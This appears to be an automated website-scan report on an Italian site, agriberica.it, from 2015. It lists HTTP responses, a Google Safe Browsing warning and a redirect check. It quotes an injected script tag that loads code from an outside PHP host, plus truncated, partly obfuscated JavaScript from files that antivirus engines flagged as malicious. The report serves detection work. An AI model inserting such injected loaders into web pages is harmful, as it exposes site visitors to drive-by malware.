Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=agriberica.it
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://agriberica.it/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 21 Jan 2015 08:04:25 GMT Location: http://www.agriberica.it/ Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.agriberica.it/ | HTTP/1.1 200 OK Date: Wed, 21 Jan 2015 08:04:26 GMT Accept-Ranges: bytes ETag: "b02fa33f682ed01:5987ab" Server: Microsoft-IIS/6.0 Content-Length: 10744 Content-Location: http://www.agriberica.it/index.htm Content-Type: text/html Last-Modified: Mon, 12 Jan 2015 13:04:07 GMT MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET | clean |
http://www.agriberica.it/index.htm | 200 OK Content-Length: 10744 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://mtmoriahcogic.org/zk7qvbjh.php?id=61672397"></script> | ||
http://www.agriberica.it/subnavig.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://agriberica.it/gen_subnavig.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 21 Jan 2015 08:04:26 GMT Location: http://www.agriberica.it/gen_subnavig.js Server: Apache Content-Length: 248 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.agriberica.it/gen_subnavig.js | 200 OK Content-Length: 29 Content-Type: application/x-javascript | clean |
http://agriberica.it/mouseover.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 21 Jan 2015 08:04:27 GMT Location: http://www.agriberica.it/mouseover.js Server: Apache Content-Length: 245 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.agriberica.it/mouseover.js | 200 OK Content-Length: 5979 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i ) x.src=x.oSrc; } function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i ) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j ].src=a[i];}} } function MM_findObj(n, d) { var p,i,x; Antivirus reports:
| ||
http://agriberica.it/ml.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 21 Jan 2015 08:04:27 GMT Location: http://www.agriberica.it/ml.js Server: Apache Content-Length: 238 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.agriberica.it/ml.js | 200 OK Content-Length: 5065 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function em_click(){
location.href="mailto:"; return true; } function ml_write(){ document.write('');} function ml_hp_write(){ document.write('<img title=""');} nkuxyo="s" "p" "li" "t";ifduc=window;pp Antivirus reports:
| ||
http://adminsitebuilder.aruba.it/reseller_staging/1001/2.js | 404 Not Found Content-Length: 314 Content-Type: text/html | clean |
http://adminsitebuilder.aruba.it/test404page.js | 404 Not Found Content-Length: 302 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: agriberica.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 21 Jan 2015 08:04:25 GMT
Location: http://www.agriberica.it/
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
...233 bytes of data.
GET / HTTP/1.1
Host: agriberica.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 21 Jan 2015 08:04:25 GMT
Location: http://www.agriberica.it/
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
...233 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: agriberica.it
Referer: http://www.google.com/search?q=agriberica.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: agriberica.it
Referer: http://www.google.com/search?q=agriberica.it
Result:
The result is similar to the first query. There are no suspicious redirects found.